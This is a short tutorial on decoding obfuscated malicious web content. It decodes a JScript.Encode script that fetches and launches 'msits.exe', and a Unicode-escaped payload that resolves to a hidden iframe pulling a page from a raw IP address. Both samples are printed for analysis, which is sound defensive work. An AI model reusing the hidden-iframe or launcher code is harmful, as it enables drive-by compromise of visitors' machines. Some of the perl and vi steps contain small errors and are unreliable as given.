Decode Suspicous JavaScript and HTML Content

A lot of exploits that occur over the web try to be as discreet as possible. In an attempt to hide the instructions your browser downloads and executes after visiting a dangerous site, attackers encode those commands so they are not easily deciphered without special tools.

One of these special tools is already built into the browser, or else the browser itself could not understand the instructions, however there is no easy interface to the interpretation before such code is run. A handy tool for investigating the content of pages with encoded javascript is available at http://www.virtualconspiracy.com. Here is an example of its use:

Snippet of encoded web page:

[html] [head] [/head] [body] [DIV id="ObjectContainer"][/DIV] [IFRAME name="icounter" \
width=60 height=30 style="display:none"][/IFRAME][script type="text/JScript.Encode" \
language="JScript.Encode"]

#@~^+goAAA==@#@&P~,@#@&PP,0!Um
DkGx,MnOkmD/bGU`*@#@&P~P`@#@&P~P,~\mD~(A\+.dbWU'C7kLmYKDRmwa#+M/rW@#@&,PP,~k6P`& \
3-+M/bWURrU9+ar6cBqkU[Kh/~1lBbPex,Oq*PM+Y!D~JO*E@#@&P~~,P+^d+,k0,c(27+M/rWU bx[+X60vB \
rNWAd,1PPWv*PZ{P F#,OEMx~JgKE@#@&PP,~V~r0,`&2-+.dbW
URbU66WvrU,,aBb,"{PO8#,.+DE.x,J\3r@#@&,~P,P+^dnPb0,`(2-nM/rW   na}0`v

[/script] [/body] [/html]

Now download the script decoder from the link above, compile it (there's a Windows binary also), and run the encoded script through as an arguement:

# gcc scrdec14.c
# ./a.out  
# cat 

[html] [head] [/head] [body] [DIV id="ObjectContainer"][/DIV] [IFRAME name="icounter" \
width=60 height=30 style="display:none"][/IFRAME][script type="text/JScript.Encode" \
language="JScript.Encode"]
   
   function Get_Win_Version()
   {
     var IEversion=navigator.appVersion;
     if (IEversion.indexOf('Windows 95') != -1) return "95"
     else if (IEversion.indexOf('Windows NT 4') != -1) return "NT"
     else if (IEversion.indexOf('Win 9x 4.9') != -1) return "ME"
     else if (IEversion.indexOf('Windows 98') != -1) return "98"
     else if (IEversion.indexOf('Windows NT 5.0') != -1) return "2K"
     else if (IEversion.indexOf('Windows NT 5.1') != -1) return "XP"
   }
 
   switch(iPrefix)
   {
   case "http://" :
                   j=InetPath.lastIndexOf('/');
                   InetPath=InetPath.slice(0,j)+'/msits.exe';
                   break;
   case "ms-its:" :
                   i=InetPath.indexOf('!');
                   j=InetPath.lastIndexOf('//');
                   InetPath=InetPath.slice(i+1,j)+'/msits.exe';
                   break;
   }
 
   var WinOS=Get_Win_Version();
   
   if ((WinOS=="95")||(WinOS=="98"))
   {
      LaunchExecutable9X(InetPath);
   }
[/script] [/body] [/html]

There is your decoded script. The exploit itself is another discussion entirely, (see msits.exe in there?).

Convert Unicode content to human-readable ASCII

Similar to above, another way to stay hidden from users and even bypass layer-7 content filtering is to send instructions as Unicode. Once again, the browser reads Unicode just fine and executes given commands unfettered , however it produces quite a challenge for humans to interpret Unicode. Sure its easy to remember a few strings such as %20, which is a space character, but the whole alphabet and all special keys - no way. Here is a file I found while investigating a web exploit, it was named ff-FAI.html:

[A HREF=http://friendfinder.com/go/f43059 target=_blank]
[img src=http://ads.friendfinder.com/banners/ff/ffalert4.gif WIDTH=468 \
HEIGHT=60 BORDER=0][/a]

[!-- HP2 --]

[script type="text/javascript"]document.write('\u003c\u0069\u0066\u0072
\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068
\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035
\u0030\u002e\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\
u0070\u0032\u002f\u0068\u0070\u0032\u002e\u0068\u0074\u006d
\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020
\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c
\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')[/script]

There may be easier ways to deal with this, but I came up with a creative mixture of vi and perl. Open ff-FAI.html (or whatever file you have) and enter the following command:

:s%/\\u/}\\x{/g

Then place quotations around the block of Unicode and precede it with the 'print' command so that it looks like this:

print "\x{003c}}\x{0069}}\x{0066}}\x{0072}}\x{0061}}\x{006d}}
\x{0065}}\x{0020}\x{0073}\x{0072}\x{0063}\x{003d}\x{0022}
\x{0068}\x{0074}\x{0074}\x{0070}\x{003a}\x{002f}\x{002f}
\x{0036}\x{0039}\x{002e}\x{0035}\x{0030}\x{002e}\x{0031}
\x{0033}\x{0039}\x{002e}\x{0036}\x{0031}\x{002f}\x{0068}
\x{0070}\x{0032}\x{002f}\x{0068}\x{0070}\x{0032}\x{002e}
\x{0068}\x{0074}\x{006d}\x{0022}\x{0020}\x{0077}\x{0069}
\x{0064}\x{0074}\x{0068}\x{003d}\x{0031}\x{0020}\x{0068}
\x{0065}\x{0069}\x{0067}\x{0068}\x{0074}\x{003d}\x{0031}
\x{003e}\x{003c}\x{002f}\x{0069}\x{0066}\x{0072}\x{0061}
\x{006d}\x{0065}\x{003e}"

Run the file with perl and see what you just unveiled:

# perl ff-FAI.html

[iframe src="http://69.50.139.61/hp2/hp2.htm" width=1 height=1][/iframe]

Thats it! The huge block of Unicode boils down to the covert download of a file named hp2.htm within an iframe on the open browser page. We would later find that within hp2.htm was code to fetch hp2.CHM and then an a complete compromise followed.